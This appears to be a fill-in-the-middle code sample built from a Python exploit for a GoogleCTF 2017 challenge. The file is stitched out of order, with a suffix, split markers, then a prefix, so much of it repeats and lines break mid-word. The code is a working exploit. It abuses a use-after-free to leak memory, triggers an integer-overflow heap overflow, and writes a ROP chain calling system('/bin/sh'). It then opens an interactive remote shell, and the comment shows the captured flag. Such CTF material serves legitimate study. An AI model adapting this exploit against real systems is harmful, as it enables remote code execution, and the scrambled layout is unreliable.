TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert(all(b not in data for b in badchars))
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
lines = []
chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\033['
ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception("Pattern length is way to large")
def _generate(self, n):
"""Generate a De Bruijn sequence."""
# See https://en.wikipedia.org/wiki/De_Bruijn_sequence
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx+len(needle):].find(needle) != -1:
raise ValueError("Multiple occurances found!")
return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
# Various Thresholds for the heuristics below
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
# Step 1: Tag every byte of the input stream with it's detected type.
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
# Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i+1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
# Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
# start and end point outside the range of equal-valued characters now.
if end - start >= Y+2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
# Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
buf = ''
last = None
for tag, value in parts:
# Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
# Step 4: Print :)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException("Server disconnected.")
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
# This code also works if n > len(self._buf)
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
# TODO maybe not make this O(n**2)...
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def i | self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
# TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info("Server disconnected.")
return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert(sys.stdin.isatty())
c.setVerbose(False)
# Open a PTY and spawn a bash connected to the slave end on the remote side
code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
# Should maybe put some more functionality into the inline python code instead.
# Save current TTY settings
old_settings = termios.tcgetattr(sys.stdin.fileno())
# Put TTY into raw mode
tty.setraw(sys.stdin)
# Resize remote terminal
# Nice-to-have: also handle terminal resize
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n') # terminal echo
recvtil('READY\r\n') # command output
interact()
# Restore previous settings
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
# Trigger heap info leak
evl('h=0+0')
return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 0xb0
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(15):
evl('{}'.format(i))
# 19 slots filled
# allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
# Then the output value is allocated into the same slot. Since the output value is String (type of x),
# lhs is turned into a string with controlled pointer
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 0x170
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
# 2 slots always filled from now on (global object and int value 1337)
heap_base = heapleak()
# 3 slots always filled from now on
print_good("Heap base @ 0x{:x}".format(heap_base))
# Create a smallbin chunk so we can leak a libc pointer
evl('"{}"'.format('A' * 0x100))
gc(20 - 4)
# Leak freelist pointers pointing into the libc
heap_mem = leak(heap_base, 0x1000)
for i in range(0, len(heap_mem)-16, 8):
# Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
flink = u64(heap_mem[i:i+8])
blink = u64(heap_mem[i+8:i+16])
if (abs(flink - heap_base) > 0x10000 and
flink > 0x7f0000000000 and
flink < 0x800000000000 and
blink > 0x7f0000000000 and
blink < 0x800000000000):
break
else:
print_bad("No freelist pointers found :(")
return
libc = flink - 0x3c1928
print_good("libc @ 0x{:x}".format(libc))
# Leak stack pointer by reading environ pointer in libc
env_ptr = u64(leak2(libc + 0x3c44a0, 8))
print_good("stack @ 0x{:x}".format(env_ptr))
# Calculate addresses
system = libc + 0x46590
bin_sh = libc + 0x180103
pop_rdi = libc + 0x22b9a
pop_rsi = libc + 0x24885
pop_rdx = libc + 0x1b8e
add_rsp_0x48 = libc + 0xf5b8b
print_good("/bin/sh @ 0x{:x}".format(bin_sh))
input_buf = env_ptr - 0x328
print_good("input_buf @ 0x{:x}".format(input_buf))
ret_addr = env_ptr - 0x328 - 8
print_good("return address @ 0x{:x}".format(ret_addr))
# 5 slots always filled from now
#
# Heap spray with Property instances to get a controlled heap layout again
#
# Make some objects
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
# Trigger GC
for i in range(9):
evl('"{}"'.format('A' * 0x10))
evl('1337')
# 10 slots used
# Allocate lots of properties (but no values)
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
# Set up heap layout for unbounded heap overflow. We need the following layout:
# | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
# We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
for i in range(6):
evl('1337')
# Create some properties
for i in 'ghijk':
evl('{}=x'.format(i))
# Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
payload += b'\x00' * (0x180 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 0x1e80
# Trigger the overflow
evl('p=o+{}'.format(fake_str_addr))
# Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
payload = b'A' * 0x100
payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good("binary @ 0x{:x}".format(binary))
offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
print_good("offset to return address: 0x{:x}".format(offset_to_ret))
# Some unfortunate restrictions...
if offset_to_ret > 0x28 or offset_to_ret < 0:
print_bad("Bad offset")
return
prop_name = p64(binary + 0xAC9)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad("Bad propery name: {}".format(prop_name))
return
prop_name = chr(prop_name)
print_good("property name: {}".format(prop_name))
# Write ROP chain into stack
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
# Trigger corruption of InputBuffer.ptr to point further down in the stack
evl('{}=42'.format(prop_name))
# Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
payload = b'A'*offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
# Wait a short while and drop into interactive mode == shell
time.sleep(0.5)
interact()
if __name__ == '__main__':
pwn()
| nteract( | identifier_name |
snippet.py | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert(all(b not in data for b in badchars))
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
lines = []
chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\033['
ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
s | elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception("Pattern length is way to large")
def _generate(self, n):
"""Generate a De Bruijn sequence."""
# See https://en.wikipedia.org/wiki/De_Bruijn_sequence
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx+len(needle):].find(needle) != -1:
raise ValueError("Multiple occurances found!")
return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
# Various Thresholds for the heuristics below
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
# Step 1: Tag every byte of the input stream with it's detected type.
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
# Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i+1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
# Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
# start and end point outside the range of equal-valued characters now.
if end - start >= Y+2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
# Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
buf = ''
last = None
for tag, value in parts:
# Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
# Step 4: Print :)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException("Server disconnected.")
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
# This code also works if n > len(self._buf)
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
# TODO maybe not make this O(n**2)...
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
# TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info("Server disconnected.")
return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert(sys.stdin.isatty())
c.setVerbose(False)
# Open a PTY and spawn a bash connected to the slave end on the remote side
code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
# Should maybe put some more functionality into the inline python code instead.
# Save current TTY settings
old_settings = termios.tcgetattr(sys.stdin.fileno())
# Put TTY into raw mode
tty.setraw(sys.stdin)
# Resize remote terminal
# Nice-to-have: also handle terminal resize
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n') # terminal echo
recvtil('READY\r\n') # command output
interact()
# Restore previous settings
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
